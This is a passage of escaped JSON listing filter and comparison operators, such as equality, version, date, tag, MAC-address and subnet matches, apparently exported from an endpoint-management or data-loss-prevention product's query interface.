\\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"withinRepositoryDatVersion\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"withinRepositoryDatVersion\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_withinRepositoryDatVersion\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"not_withinRepositoryDatVersion\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absNewerThanAbsolute_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"childOf\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"childOf\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"descendsFrom\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"descendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isNotNullTrueFalse\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"isNotNullTrueFalse\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"in\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToManySingleSelect_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToManySingleSelect_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToManySingleSelect_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToManySingleSelect_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absNewerThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"policynodeDescendsFrom\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"policynodeDescendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_isNull_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_isNull_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"in\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_contains_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_contains_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_not_equals_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_not_equals_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_not_contains_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_not_contains_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_equals_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_equals_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"hasTagExcluded\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"hasTagExcluded\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"hasTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"hasTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"containsTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"containsTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"doesNotHaveTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"doesNotHaveTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"doesNotHaveAnyTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"doesNotHaveAnyTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"mac_not_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match any of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"mac_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notBetween\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Matches one of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"between\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is between\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_in_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_match_any\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match any of the following\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_in_ipv6_subnet\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not match subnet mask\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  